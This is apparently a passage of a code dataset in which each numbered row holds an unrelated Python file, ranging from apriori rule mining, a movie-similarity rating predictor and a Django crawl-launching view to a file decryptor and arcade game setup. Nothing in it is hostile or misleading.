    # `desc_json`: JSON string whose 'answers' list labels each column.
    # Returns the parsed description dict with a 'rules' list added.
    desc_json = json.loads(desc_json)
    # Python 2 only: force UTF-8 default encoding for the answer labels.
    import sys
    reload(sys)
    sys.setdefaultencoding('utf-8')
    rows = data.split('\n')
    # Drop a trailing empty line produced by a final newline.
    if rows[-1]=="":
        rows=rows[:-1]
    rows = [x.split(",") for x in rows ]
    desc = rows[0]
    data = rows[1:]
    dataset = []
    for row in data:
        # Build one transaction per row: "label=0" / "label=1" items.
        # NOTE(review): `set` shadows the builtin set type inside this loop.
        set = []
        for item in range (0,len(desc)):
            if int(row[item])==0:
                set.append(desc_json['answers'][item]+"=0")
            else:
                set.append(desc_json['answers'][item]+"=1")
        dataset.append(set)
    results = list(apriori(dataset,min_support=0.5,min_confidence=0.85))
    # Flatten each result's ordered statistics into one list of rules.
    ordered = [r.ordered_statistics for r in results]
    order = [item for sublist in ordered for item in sublist]
    rules = []
    for item in order:
        # Skip rules with an empty antecedent.
        if len(item.items_base)>0:
            rules.append({'items_base':[x for x in item.items_base], 'items_add':[x for x in item.items_add],'confidence':item.confidence,'lift':item.lift})
    desc_json['rules']=rules
    return desc_json
#
# f = open("/home/zuchens/pmoves_sample_data/multiple_choice_description.json",'rb')
# desc = f.read()
#
# f = open("/home/zuchens/pmoves_sample_data/multiple_choice_data.csv", 'rb')
# data = f.read()
#
# print apriori_rules(data,desc)
|
18,746 | 89a5f57f33661151cddbbb379c66cc1fcbfda143 | import math
# Python 2 script: repeatedly read a count n, then n integers on one line,
# and print the population standard deviation of each block; n == 0 stops.
while 1:
    n=input()
    if n==0:
        break
    s=map(int,raw_input().split())
    # Mean of the sample.
    m=0.0
    for i in range(n):
        m+=s[i]
    m=m/n
    # Population variance (divide by n, not n-1), then square root.
    a=0.0
    for i in range(n):
        a+=(s[i]-m)**2
    a=(a/n)**0.5
    print a
18,747 | ae6f72e21ff8023016c8b836572c4f77cde95551 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
from logging import Logger
import logging.config
from oh_my_logging.builders import LoggerBuilderFactory
from oh_my_logging.decorators import log_args
def setup_module(module):
    """Route the root logger to an in-memory handler before the tests run."""
    global dictConfig
    memory_handler = {
        'class': 'oh_my_logging.handlers.MemoryHandler',
        'formatter': 'default',
    }
    dictConfig = {
        'version': 1,
        'root': {
            'level': 'DEBUG',
            'handlers': ['memory'],
        },
        'handlers': {
            'memory': memory_handler,
        },
        'formatters': {
            'default': {
                'format': '%(message)s',
            },
        },
    }
    # Reset any builder state left over from other test modules, then
    # install the fresh configuration.
    LoggerBuilderFactory.unsafe_clear()
    LoggerBuilderFactory(dictConfig)
def test_log_args_on_function():
    """@log_args should log a call's arguments as 'name=value' pairs."""
    @log_args
    def func(name, num):
        pass
    func('oh_my_logging', 123)
    # The in-memory handler keeps the last formatted record in `.message`.
    logger = LoggerBuilderFactory().builder(func).build()
    assert logger.root.handlers[0].message == 'params: %s' % 'name=oh_my_logging, num=123'
|
18,748 | 2887629cf96dd05d69cc20730b4aa0cc581e1c1e | class C:
def __init__(self, v) :
self.value = v
def show(self) :
print(self.value)
def getValue(self) :
return self.value
def setValue(self, v) :
self.value = v
# Demo: exercise the accessor methods (direct-attribute variants kept
# commented out for comparison).
c1 = C(10)
# print(c1.value)
print(c1.getValue())
# c1.value = 20
c1.setValue(20)
# print(c1.value)
print(c1.getValue())
# c1.show()
|
18,749 | 273607772830403f0dd9bb262de5f57d0ab9b8ff | __all__ = ["factorySimClass", "factorySimEnv", "customModels", "baseConfigs", "creation", "routing", "rendering", "kpi", "factoryObject"] |
18,750 | da799f3aaf9c5d9543cf39fc167d30082e124d74 | from cy.Box import AESBox, Box
import pickle
import argparse
import sys
import os
def resource_path(relative_path):
    """ Get absolute path to resource, works for dev and for PyInstaller """
    # PyInstaller unpacks bundled data into a temp dir exposed as
    # sys._MEIPASS; outside a bundle, resolve against the current directory.
    base_path = getattr(sys, '_MEIPASS', None)
    if base_path is None:
        base_path = os.path.abspath(".")
    return os.path.join(base_path, relative_path)
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='You Only Live Once!')
    parser.add_argument('passcode', metavar='P', default=None, type=str, help='The passcode of life and death')
    args = parser.parse_args()
    root = resource_path('data')
    # All regular files inside the bundled data directory.
    files = [ f for f in os.listdir(root) if os.path.isfile(os.path.join(root, f)) ]
    if len(files) > 0:
        df = os.path.join(root, files[0])
        # Load the serialized AES box and decrypt it with the passcode.
        with open(df, "rb") as fd:
            crypt = Box.deserialize(pickle.load(fd), boxtype=AESBox)
            crypt.decrypt(args.passcode)
            # NOTE(review): explicit close is redundant -- `with` closes the file.
            fd.close()
        # Persist the (now decrypted) box state back to the same file.
        with open(df, "wb") as fd:
            pickle.dump(crypt.serialize(), fd)
            fd.flush()
            fd.close()
        # Write the plaintext next to the executable: as text when an encoding
        # is recorded on the box, otherwise as raw bytes.
        if crypt.encoding is not None:
            with open('./decrypted', "w") as fd:
                fd.write(crypt.data.decode(crypt.encoding))
                fd.close()
        else:
            with open('./decrypted', "wb") as fd:
                fd.write(crypt.data)
                fd.close()
|
18,751 | c9480dcbfaba81527d1a68ab65ab245463a8ad76 | import re
import tqdm
import matplotlib.pyplot as plt
from kaldiio import ReadHelper, WriteHelper
def main():
    """Plot a histogram of per-word CTM confidences for each data set."""
    output_dir = "my_data/noise_vector/sad/view"
    for dset in ["train_si84_multi_sp", "test_A", "test_B", "test_C", "test_D"]:
        print(f"Processing {dset}...")
        # Map the dataset name to its decode-directory suffix.
        suffix = re.sub("train_|test_", "", dset)
        decode_dir = f"exp/tri3b_multi/decode_tgpr_{suffix}"
        # NOTE(review): mfcc_dir is never used below -- confirm before removing.
        mfcc_dir = f"data/{dset}_hires"
        # confidence: CTM lines are "uid channel start duration word conf".
        conf_list = []
        with open(f"{decode_dir}/score_10/{dset}.ctm") as ctm_reader:
            for line in ctm_reader:
                uid, channel, start, duration, word, conf = line.strip().split()
                conf_list += [float(conf)]
        plt.hist(conf_list, alpha=0.5)
        plt.savefig(f"{output_dir}/{dset}.conf.png")
        plt.clf()
        # weights (disabled pass over per-frame weight archives)
        # weights_list = []
        # with ReadHelper(f"ark: gunzip -c {decode_dir}/weights_1.0.gz |") as weights_reader:
        #     for uid, weights in tqdm.tqdm(weights_reader):
        #         weights_list += weights.tolist()
        # plt.hist(weights_list, alpha=0.5)
        # plt.savefig(f"{output_dir}/{dset}.weights.png")
        # plt.clf()
# Script entry point.
if __name__ == "__main__":
    main()
18,752 | 150414f75be823573e350c48988545833b416f8e | # How can I get an specific id from html code with python?
# Find the first tag with attribute name="stainfo"; `soup` is presumably a
# BeautifulSoup document built elsewhere (not visible here) -- TODO confirm.
inputTag = soup.find(attrs={"name": "stainfo"})
# NOTE(review): fails (TypeError/KeyError) if no matching tag or no 'value'
# attribute exists -- confirm the page always contains it.
output = inputTag['value']
|
18,753 | 2dd83ff9e9ad7cf4189596146a6c0793d3636596 | # This Python file uses the following encoding: utf-8
'''
In England the currency is made up of pound, £, and pence, p, and there are eight coins in general circulation:
1p, 2p, 5p, 10p, 20p, 50p, £1 (100p) and £2 (200p).
It is possible to make £2 in the following way:
1×£1 + 1×50p + 2×20p + 1×5p + 1×2p + 3×1p
How many different ways can £2 be made using any number of coins?
'''
def coin_sum_combos(pence):
    """Count the ways to make `pence` from standard UK coin denominations.

    Classic coin-change dynamic programme: process one denomination at a
    time so each combination is counted exactly once, independent of coin
    order. Returns the count as a string (matching the original contract).
    """
    denominations = (1, 2, 5, 10, 20, 50, 100, 200)
    ways = [1] + [0] * pence
    for coin in denominations:
        for total in range(coin, pence + 1):
            ways[total] += ways[total - coin]
    return str(ways[pence])
# Project Euler problem 31 driver: ways to make two pounds (200 pence).
if __name__ == "__main__":
    print(coin_sum_combos(200))
    #prints 73682
|
def more_paper_camo(request):
    """MORE/CAMO content-based movie similarity plus rating prediction.

    Phase 1: for each seed movie id, build a "surprisal" vector over its
    genre/sub-genre/director/based-on/about terms (sum of -log2 of each
    term's frequency across 1103 movies), build the same vector for a
    candidate movie, and record the cosine similarity per candidate.
    Phase 2: for reviewers with 30-50 reviews, predict their rating of the
    movies in `movie_list_mae` using a mu + item-bias + user-bias baseline
    plus a similarity-weighted neighborhood term, appending the signed
    error to 'more_mmta_dbpedia.txt'.

    NOTE(review): Python 2 code (print statements, viewkeys/iteritems).
    `new_range` is read below but never defined in this function —
    presumably a module-level global; confirm before running.
    """
    import math
    feature_dict={}
    movie_list =[]
    import itertools as it
    movie_list = [14,15] #movie ids for which you need to compute similarity based on MORE
    for moviename in movie_list:
        # Per-feature term lists for the seed movie ("movie 1").
        a_list_genre = []
        a_list_sub_genre =[]
        a_list_director =[]
        a_list_based_on=[]
        a_list_about =[]
        a_list_movie_topics =[]
        movie_1_vector = []
        for i in Movie_Details.objects.filter(id=moviename):
            print i.name
            m1_string = i.genre
            m1_genre = m1_string.split(',')
            a_list_genre.append(m1_genre)
            y1_string = i.sub_genre
            m1_sub_genre = y1_string.split(',')
            a_list_sub_genre.append(m1_sub_genre)
            d1_string = i.director.encode('utf-8')
            m1_director = d1_string.split(',')
            a_list_director.append(m1_director)
            ca1_string = i.cast.encode('utf-8')
            m1_cast = ca1_string.split(',')
            based_on1_string = i.based_on
            m1_based_on = based_on1_string.split(',')
            a_list_based_on.append(m1_based_on)
            about1_string = i.about
            m1_about = about1_string.split(',')
            a_list_about.append(m1_about)
            movie_topics_lda_string1 = str(i.movie_topics_lda)
            movie_topics_lda1 = movie_topics_lda_string1.split(', ')
            a_list_movie_topics.append(movie_topics_lda1)
            rating1 = i.rating[:3]
            theatre1 = i.theatre_release[:4]
        list222=[]
        # Flatten and de-duplicate each feature's term list.
        a_set_genre = set([item for sublist in a_list_genre for item in sublist])
        a_set_genre = list(a_set_genre)
        a_set_sub_genre = set([item for sublist in a_list_sub_genre for item in sublist])
        a_set_sub_genre = list(a_set_sub_genre)
        a_set_director = set([item for sublist in a_list_director for item in sublist])
        a_set_director = list(a_set_director)
        a_set_based_on = set([item for sublist in a_list_based_on for item in sublist])
        a_set_based_on = list(a_set_based_on)
        a_set_about = set([item for sublist in a_list_about for item in sublist])
        a_set_about = list(a_set_about)
        a_set_movie_topics = set([item for sublist in a_list_movie_topics for item in sublist])
        a_set_movie_topics = list(a_set_movie_topics)
        # Seed-movie surprisal per feature: sum over terms of
        # -log2(term count / 1103); math.log(0) raises ValueError, which
        # resets the accumulator to 0.
        if (a_set_genre):
            a=0
            for element in a_set_genre:
                element_count=0
                for movie in Movie_Details.objects.all():
                    #if b3 in q.genre.split(','):
                    if movie.genre:
                        movie_genre11=movie.genre.split(',')
                        if element in movie_genre11:
                            element_count=element_count+1
                    else:
                        element_count = 0
                # for sd in movie_genre11:
                try:
                    #print element,"====",element_count
                    prob=(element_count*1.0/1103)
                    a=a+(math.log(prob,2))
                except ValueError:
                    a=0
            set_difference_genre0 = a * (-1)
        else:
            set_difference_genre0 = 0
        movie_1_vector.append(set_difference_genre0)
        #print set_difference_genre0
        if (a_set_sub_genre):
            a=0
            for element in a_set_sub_genre:
                element_count=0
                for movie in Movie_Details.objects.all():
                    #if b3 in q.genre.split(','):
                    if movie.sub_genre:
                        movie_genre11=movie.sub_genre.split(',')
                        if element in movie_genre11:
                            element_count=element_count+1
                    else:
                        element_count = 0
                # for sd in movie_genre11:
                try:
                    #print element,"====",element_count
                    prob=(element_count*1.0/1103)
                    a=a+math.log(prob,2)
                except ValueError:
                    a=0
            set_difference_sub_genre0 = a * (-1)
        else:
            set_difference_sub_genre0 = 0
        #print set_difference_sub_genre0
        movie_1_vector.append(set_difference_sub_genre0)
        if (a_set_director):
            a=0
            for element in a_set_director:
                element_count=0
                for movie in Movie_Details.objects.all():
                    #if b3 in q.genre.split(','):
                    if movie.director:
                        movie_genre11=movie.director.split(',')
                        if element in movie_genre11:
                            element_count=element_count+1
                    else:
                        element_count = 0
                # for sd in movie_genre11:
                try:
                    #print element,"====",element_count
                    prob=(element_count*1.0/1103)
                    a=a+(math.log(prob,2))
                except ValueError:
                    a=0
            set_difference_director0 = a * (-1)
        else:
            set_difference_director0 = 0
        #print set_difference_director0
        movie_1_vector.append(set_difference_director0)
        if (a_set_based_on):
            a=0
            for element in a_set_based_on:
                element_count=0
                for movie in Movie_Details.objects.all():
                    #if b3 in q.genre.split(','):
                    if movie.based_on:
                        movie_genre11=movie.based_on.split(',')
                        if element in movie_genre11:
                            element_count=element_count+1
                    else:
                        element_count = 0
                # for sd in movie_genre11:
                try:
                    #print element,"====",element_count
                    prob=(element_count*1.0/1103)
                    a=a+(math.log(prob,2))
                except ValueError:
                    a=0
            set_difference_based_on0 = a * (-1)
        else:
            set_difference_based_on0 = 0
        #print set_difference_based_on0
        movie_1_vector.append(set_difference_based_on0)
        if (a_set_about):
            a=0
            for element in a_set_about:
                element_count=0
                for movie in Movie_Details.objects.all():
                    #if b3 in q.genre.split(','):
                    if movie.about:
                        movie_genre11=movie.about.split(',')
                        if element in movie_genre11:
                            element_count=element_count+1
                    else:
                        element_count = 0
                # for sd in movie_genre11:
                try:
                    #print element,"====",element_count
                    prob=(element_count*1.0/1103)
                    a=a+(math.log(prob,2))
                except ValueError:
                    a=0
            set_difference_about0 = a * (-1)
        else:
            set_difference_about0 = 0
        #print set_difference_about0
        movie_1_vector.append(set_difference_about0)
        ''' ## If you want MORE to be used with full CAMO uncomment this and used it
        if (a_set_movie_topics):
            a=0
            for element in a_set_movie_topics:
                element_count=0
                for movie in Movie_Details.objects.all():
                    #if b3 in q.genre.split(','):
                    if movie.movie_topics_lda:
                        movie_genre11=movie.movie_topics_lda.split(', ')
                        if element in movie_genre11:
                            element_count=element_count+1
                    else:
                        element_count = 0
                # for sd in movie_genre11:
                try:
                    #print element,"====",element_count
                    prob=(element_count*1.0/1103)
                    a=a+(math.log(prob,2))
                except ValueError:
                    a=0
            set_difference_movie_topics0 = a * (-1)
        else:
            set_difference_movie_topics0 = 0
        movie_1_vector.append(set_difference_movie_topics0)
        '''
        # Candidate movie ("movie 2") — same vector, built for id=new_range.
        for k in Movie_Details.objects.filter(id=new_range):
            b_list_genre = []
            b_list_sub_genre =[]
            b_list_director =[]
            b_list_based_on=[]
            b_list_about =[]
            b_list_movie_topics =[]
            movie_2_vector = []
            m2_string = k.genre
            m2_genre = m2_string.split(',')
            b_list_genre.append(m2_genre)
            y2_string = k.sub_genre
            m2_sub_genre = y2_string.split(',')
            b_list_sub_genre.append(m2_sub_genre)
            d2_string = k.director.encode('utf-8')
            m2_director = d2_string.split(',')
            b_list_director.append(m2_director)
            ca2_string = k.cast.encode('utf-8')
            m2_cast = ca2_string.split(',')
            based_on2_string = k.based_on
            m2_based_on = based_on2_string.split(',')
            b_list_based_on.append(m2_based_on)
            about2_string = k.about
            m2_about = about2_string.split(',')
            b_list_about.append(m2_about)
            movie_topics_lda_string2 = str(k.movie_topics_lda)
            movie_topics_lda2 = movie_topics_lda_string2.split(', ')
            b_list_movie_topics.append(movie_topics_lda2)
            rating2 = k.rating[:3]
            #import pdb;pdb.set_trace()
            b_set_genre = set([item for sublist in b_list_genre for item in sublist])
            b_set_genre = list(b_set_genre)
            b_set_sub_genre = set([item for sublist in b_list_sub_genre for item in sublist])
            b_set_sub_genre = list(b_set_sub_genre)
            b_set_director = set([item for sublist in b_list_director for item in sublist])
            b_set_director = list(b_set_director)
            b_set_based_on = set([item for sublist in b_list_based_on for item in sublist])
            b_set_based_on = list(b_set_based_on)
            b_set_about = set([item for sublist in b_list_about for item in sublist])
            b_set_about = list(b_set_about)
            b_set_movie_topics = set([item for sublist in b_list_movie_topics for item in sublist])
            b_set_movie_topics = list(b_set_movie_topics)
            # Finding the set difference a-b
            #import pdb;pdb.set_trace()
            #print set_difference_movie_topics0
            if (b_set_genre):
                a=0
                for element in b_set_genre:
                    element_count=0
                    for movie in Movie_Details.objects.all():
                        #if b3 in q.genre.split(','):
                        if movie.genre:
                            movie_genre11=movie.genre.split(',')
                            if element in movie_genre11:
                                element_count=element_count+1
                        else:
                            element_count = 0
                    # for sd in movie_genre11:
                    try:
                        #print element,"====",element_count
                        prob=(element_count*1.0/1103)
                        a=a+(math.log(prob,2))
                    except ValueError:
                        a=0
                set_difference_genre1 = a * (-1)
            else:
                set_difference_genre1 = 0
            #import pdb;pdb.set_trace()
            movie_2_vector.append(set_difference_genre1)
            #print set_difference_genre0
            if (b_set_sub_genre):
                a=0
                for element in b_set_sub_genre:
                    element_count=0
                    for movie in Movie_Details.objects.all():
                        #if b3 in q.genre.split(','):
                        if movie.sub_genre:
                            movie_genre11=movie.sub_genre.split(',')
                            if element in movie_genre11:
                                element_count=element_count+1
                        else:
                            element_count = 0
                    # for sd in movie_genre11:
                    try:
                        #print element,"====",element_count
                        prob=(element_count*1.0/1103)
                        a=a+math.log(prob,2)
                    except ValueError:
                        a=0
                set_difference_sub_genre1 = a * (-1)
            else:
                set_difference_sub_genre1 = 0
            #print set_difference_sub_genre0
            movie_2_vector.append(set_difference_sub_genre1)
            #import pdb;pdb.set_trace()
            if (b_set_director):
                a=0
                for element in b_set_director:
                    element_count=0
                    for movie in Movie_Details.objects.all():
                        #if b3 in q.genre.split(','):
                        if movie.director:
                            movie_genre11=movie.director.split(',')
                            if element in movie_genre11:
                                element_count=element_count+1
                        else:
                            element_count = 0
                    # for sd in movie_genre11:
                    try:
                        #print element,"====",element_count
                        prob=(element_count*1.0/1103)
                        a=a+(math.log(prob,2))
                    except ValueError:
                        a=0
                set_difference_director1 = a * (-1)
            else:
                set_difference_director1 = 0
            movie_2_vector.append(set_difference_director1)
            #print set_difference_director0
            if (b_set_based_on):
                a=0
                for element in b_set_based_on:
                    element_count=0
                    for movie in Movie_Details.objects.all():
                        #if b3 in q.genre.split(','):
                        if movie.based_on:
                            movie_genre11=movie.based_on.split(',')
                            if element in movie_genre11:
                                element_count=element_count+1
                        else:
                            element_count = 0
                    # for sd in movie_genre11:
                    try:
                        #print element,"====",element_count
                        prob=(element_count*1.0/1103)
                        a=a+(math.log(prob,2))
                    except ValueError:
                        a=0
                set_difference_based_on1 = a * (-1)
            else:
                set_difference_based_on1 = 0
            #print set_difference_based_on0
            movie_2_vector.append(set_difference_based_on1)
            if (b_set_about):
                a=0
                for element in b_set_about:
                    element_count=0
                    for movie in Movie_Details.objects.all():
                        #if b3 in q.genre.split(','):
                        if movie.about:
                            movie_genre11=movie.about.split(',')
                            if element in movie_genre11:
                                element_count=element_count+1
                        else:
                            element_count = 0
                    # for sd in movie_genre11:
                    try:
                        #print element,"====",element_count
                        prob=(element_count*1.0/1103)
                        a=a+(math.log(prob,2))
                    except ValueError:
                        a=0
                set_difference_about1 = a * (-1)
            else:
                set_difference_about1 = 0
            #print set_difference_about0
            movie_2_vector.append(set_difference_about1)
            ''' Uncomment this to use MORE with CAMO
            if (b_set_movie_topics):
                a=0
                for element in b_set_movie_topics:
                    element_count=0
                    for st in it.chain(range(6,106), range(358,458), range(786,886)):
                        for movie in Movie_Details.objects.filter(id=st):
                            #if b3 in q.genre.split(','):
                            if movie.movie_topics_lda:
                                movie_genre11=movie.movie_topics_lda.split(', ')
                                if element in movie_genre11:
                                    element_count=element_count+1
                            else:
                                element_count = 0
                    # for sd in movie_genre11:
                    try:
                        #print element,"====",element_count
                        prob=(element_count*1.0/300)
                        a=a+(math.log(prob,2))
                    except ValueError:
                        a=0
                set_difference_movie_topics1 = a * (-1)
            else:
                set_difference_movie_topics1 = 0
            movie_2_vector.append(set_difference_movie_topics1)
            '''
            # Cosine similarity between the two surprisal vectors.
            from numpy import dot
            from numpy.linalg import norm
            from scipy import spatial
            #cos_sim = dot(movie_1_vector, movie_2_vector)/(norm(movie_1_vector)*norm(movie_2_vector))
            cos_sim = 1 - spatial.distance.cosine(movie_1_vector, movie_2_vector)
            feature_dict[k.name.encode('utf-8')] = cos_sim
            print k.id
            print k.name.encode('utf-8')
            print cos_sim
            print i.name.encode('utf-8')
            #import pdb;pdb.set_trace()
            print '=================================================================================================='
        import operator
        # Persist the similarity list (ascending) on the seed movie.
        sorted_x = sorted(feature_dict.items(), key=operator.itemgetter(1))
        for m in Movie_Details.objects.filter(id=moviename):
            m.movie_similarity_pearson_correlation = sorted_x
            m.save()
            print m.id
            print m.name.encode('utf-8')
    ## Rating Prediction using MORE
    mae=[]
    movie_list_mae = [13] ## Write the name of the Movie ID
    query_list = []
    # Reviewers with between 30 and 50 reviews.
    s=Reviewer_Profile.objects.raw('SELECT id,reviewer_name,reviewer_id, count(reviewer_id) FROM imdbrotten.app_imdb_reviewer_profile group by reviewer_id having count(reviewer_id) between 30 and 50;')
    for k in s:
        query_list.append(k.reviewer_id)
    print query_list
    for mov in movie_list_mae:
        for q in query_list:
            for rw in Reviewer_Profile.objects.filter(reviewer_id__icontains=q):
                if rw.movie_ratings:
                    if rw.movie_name_id == mov:
                        list12=[]
                        simt_dict={}
                        user_movie=[]
                        user_movie1=[]
                        n22={}
                        movie_id={}
                        import ast
                        import operator
                        import itertools
                        from itertools import islice
                        # Top-30 most-similar movies stored on the target movie.
                        for i in Movie_Details.objects.filter(id=mov):
                            new_dict=(i.movie_similarity_jaccard)
                            simt_dict = dict(list(ast.literal_eval(new_dict)))
                            sorted_x = sorted(simt_dict.items(), key=operator.itemgetter(1))
                            sorted_dict = dict(sorted_x[-30:])
                            print sorted_dict
                        #import pdb;pdb.set_trace()
                        for i in Reviewer_Profile.objects.filter(reviewer_id__icontains=q):
                            user_movie.append(i.movie_name_id)
                        print user_movie
                        for k in Movie_Details.objects.all():
                            for i in user_movie:
                                if k.id==i:
                                    user_movie1.append(k.name)
                        #print user_movie1
                        # Neighbors the reviewer has actually rated.
                        n22 = {k: sorted_dict[k] for k in sorted_dict.viewkeys() & set(user_movie1)}
                        print n22
                        for b in Movie_Details.objects.all():
                            movie_id[b.name] = b.id
                        #print movie_id
                        flat_lis = dict((movie_id[key], value) for (key, value) in n22.items())
                        for r in flat_lis:
                            for s in Movie_Details.objects.filter(id=r):
                                print s.name
                        print ('\n')
                        # Baseline: global mean mu, user bias bu, item bias bi.
                        mu = 6.12
                        user_rating_count = 0
                        no_of_movie = 0
                        for k in Reviewer_Profile.objects.filter(reviewer_id__icontains=q):
                            if k.movie_ratings:
                                no_of_movie = no_of_movie +1
                                user_rating_count = user_rating_count + int(k.movie_ratings[:-3])
                        bu = float(user_rating_count)/no_of_movie
                        if (mu>bu):
                            bu = mu - bu
                            bu=bu*(-1)
                        if (mu<bu):
                            bu=bu-mu
                        movie_rat = 0
                        count_movie = 0
                        for r in Movie_Details.objects.filter(id=mov):
                            '''
                            if r.movie_ratings:
                                count_movie = count_movie +1
                                movie_rat = movie_rat + int(r.movie_ratings[:1])
                            '''
                            bi = float(r.rating[:-3])
                            #bi = float(movie_rat)/count_movie
                            if (mu>bi):
                                bi = mu - bi
                                bi=bi*(-1)
                            if (mu<bi):
                                bi=bi-mu
                        total_similarity=0
                        count_loop = 0
                        sim_value = 0
                        # Neighborhood term: residuals of the rated neighbors,
                        # normalized by total similarity mass.
                        if flat_lis:
                            for key, value in flat_lis.iteritems():
                                for k in Reviewer_Profile.objects.filter(reviewer_id__icontains=q):
                                    if k.movie_ratings:
                                        if (key == k.movie_name_id):
                                            count_loop=count_loop+1
                                            sim_value = sim_value +value
                                            for bn in Movie_Details.objects.filter(id=key):
                                                bj = float(bn.rating[:-3])
                                                if (mu>bj):
                                                    bj = mu - bj
                                                    bj=bj*(-1)
                                                if (mu<bj):
                                                    bj=bj-mu
                                                total_similarity = total_similarity + (float(k.movie_ratings[:-3]) - (mu + bi + bu))
                        else:
                            count_loop = 1
                        if sim_value==0:
                            similarity_score = float(total_similarity)/1
                        else:
                            similarity_score = float(total_similarity)/sim_value
                        print rw.reviewer_name.encode('utf-8')
                        # Append "<name>\t<actual>\t<error>" to the results file.
                        f=open('more_mmta_dbpedia.txt','a')
                        #f.write(rw.reviewer_id)
                        #f.write('\t')
                        f.write(rw.reviewer_name.encode('utf-8'))
                        f.write('\t')
                        f.write(rw.movie_ratings[:-3])
                        f.write('\t')
                        differ = float(int(rw.movie_ratings[:-3]) - (mu + bi + bu + similarity_score))
                        f.write(str(differ))
                        print differ
                        print mov
                        f.write('\n')
                        f.close()
18,755 | d33f7a2e121d14bc1b63fa06ab5e1b22cf4e4713 | import subprocess
import time
from django.shortcuts import render, HttpResponse
from django.views.generic import View
from usa import STATES
from admincontrol.script_paths import *
class CrawlView(View):
    """Start a crawler run for a US state and return a log-viewing URL."""
    template_name = 'crawl.html'

    def get(self, request):
        """Render the crawl form with the list of states."""
        return render(request, self.template_name, {"states": STATES})

    def post(self, request):
        """Kick off the requested crawl type; respond with the log path."""
        state = request.POST.get("state")
        crawl_type = request.POST.get("crawl_type")
        log_file_tag = str(int(time.time()))
        log_file_name = "/home/arbisoft/logs/catest%s.txt" % log_file_tag
        # Guard against a missing crawl_type field (POST.get returns None).
        if crawl_type and crawl_type.lower() == 'favorites':
            self.run_favorite_crawl(state, log_file_name)
        return HttpResponse("control/log/%s" % log_file_tag)

    def run_favorite_crawl(self, state, log_file_name):
        """Spawn the favorites crawler detached, logging to log_file_name.

        `state` comes straight from request.POST, so it is passed as an
        argv element with shell=False instead of being interpolated into a
        shell command string — the original form was shell-injectable.
        """
        with open(log_file_name, "w") as log_file:
            subprocess.Popen(["python", FAVORITE_CRAWL_PATH, "-s", state],
                             stdout=log_file, stderr=subprocess.STDOUT)
        time.sleep(5)

    def run_weekly_crawl(self, state, log_file_name):
        """Placeholder for the weekly crawl variant (not implemented)."""
        pass
|
# Filter demo: select list elements above two different thresholds.
adhoc = [1, 2, 3, 1, 4, 5, 66, 22, 2, 6, 0, 9]
i = 0
x = [value for value in adhoc if value > 5]   # strictly greater than 5
print(x)
y = [value for value in adhoc if value >= 2]  # at least 2
print(y)
18,757 | d781c72a1d0f198e84b5b95ca368d6d0cb1e2c25 | import arcade
import numpy as np
import heapq
import tmx
import os
import timeit
import time
import io
from PIL import Image
# Grid geometry: 9 rows x 16 cols of 64x64-pixel tiles.
rc = ROWS, COLS = (9, 16)
wh = WIDTH, HEIGHT = (64, 64)
sc = SCREEN_WIDTH, SCREEN_HEIGHT = (WIDTH * COLS, HEIGHT * ROWS)
list_maps = {}   # map name -> flat list of per-cell layer-gid tuples (filled below)
array_maps = {}  # map name -> list of (height x width) gid arrays, one per layer
current_map = 'test'
loc_array = {}   # sprite-sheet name -> [x, y, w, h] rects for load_textures (filled below)
options_menu = ['Settings', 'Gameplay', 'Exit']
# All .tmx map files and every image file shipped with the game.
map_dir = [map_file for map_file in [map_file for map_file in os.listdir('./Maps') if os.path.isfile(os.path.join('./Maps', map_file))] if map_file.endswith('.tmx')]
img_dir = [img_file for img_file in os.listdir('./Images') if os.path.isfile(os.path.join('./Images', img_file))]
# Per-glyph pixel widths of the bitmap font (used for word-wrapping dialog).
char_width = {' ': 24, '!': 16, '"': 32, '#': 48, '$': 32, '%': 32, '&': 48, "'": 16, '(': 24, ')': 24, '*': 32, '+': 32, ',': 16, '-': 32, '.': 16, '/': 32,
              '0': 32, '1': 32, '2': 32, '3': 32, '4': 32, '5': 32, '6': 32, '7': 32, '8': 32, '9': 32, ':': 16, ';': 16, '<': 32, '=': 32, '>': 32, '?': 32,
              '@': 48, 'A': 32, 'B': 32, 'C': 32, 'D': 32, 'E': 32, 'F': 32, 'G': 32, 'H': 32, 'I': 32, 'J': 32, 'K': 32, 'L': 32, 'M': 48, 'N': 32, 'O': 32,
              'P': 32, 'Q': 32, 'R': 32, 'S': 32, 'T': 32, 'U': 32, 'V': 32, 'W': 48, 'X': 32, 'Y': 32, 'Z': 32, '[': 24, '\\': 32, ']': 24, '^': 32, '_': 32,
              '`': 8, 'a': 32, 'b': 32, 'c': 32, 'd': 32, 'e': 32, 'f': 32, 'g': 32, 'h': 32, 'i': 16, 'j': 32, 'k': 32, 'l': 24, 'm': 48, 'n': 32, 'o': 32,
              'p': 32, 'q': 32, 'r': 32, 's': 32, 't': 32, 'u': 32, 'v': 32, 'w': 48, 'x': 32, 'y': 32, 'z': 32, '{': 32, '|': 16, '}': 32, '~': 32}
# Key bindings: action name -> tuple of accepted arcade key codes.
movement_keys = {
    'N': (arcade.key.NUM_8, arcade.key.W, arcade.key.UP, arcade.key.NUM_UP),
    'NE': (arcade.key.NUM_9, arcade.key.NUM_PAGE_UP),
    'E': (arcade.key.NUM_6, arcade.key.D, arcade.key.RIGHT, arcade.key.NUM_RIGHT),
    'SE': (arcade.key.NUM_3, arcade.key.NUM_PAGE_DOWN),
    'S': (arcade.key.NUM_2, arcade.key.S, arcade.key.DOWN, arcade.key.NUM_DOWN),
    'SW': (arcade.key.NUM_1, arcade.key.NUM_END),
    'W': (arcade.key.NUM_4, arcade.key.A, arcade.key.LEFT, arcade.key.NUM_4, arcade.key.NUM_LEFT),
    'NW': (arcade.key.NUM_7, arcade.key.NUM_HOME),
    'Inv': (arcade.key.E, arcade.key.TAB, arcade.key.NUM_ADD),
    'Context': (arcade.key.SPACE, arcade.key.NUM_ENTER),
    'Exit': (arcade.key.ESCAPE, ),
    'Map': (arcade.key.M, arcade.key.NUM_DECIMAL),
}
# Upscale every 8x8 sheet to 64x64; index every other sheet into tile rects.
for img in img_dir:
    if '8x8' in img:
        small = Image.open('./Images/{}'.format(img))
        bigger = small.resize((small.size[0]*8, small.size[1]*8))
        bigger.save('./Images/64x64{}'.format(img.split('8x8')[1]), 'PNG')
    else:
        img_name = img.split('.')[0]
        cur_img = Image.open('./Images/{}'.format(img))
        loc_array[img_name] = [[j, i, WIDTH, HEIGHT] for i in range(0, cur_img.size[1], WIDTH) for j in range(0, cur_img.size[0], HEIGHT)]
        cur_img.close()
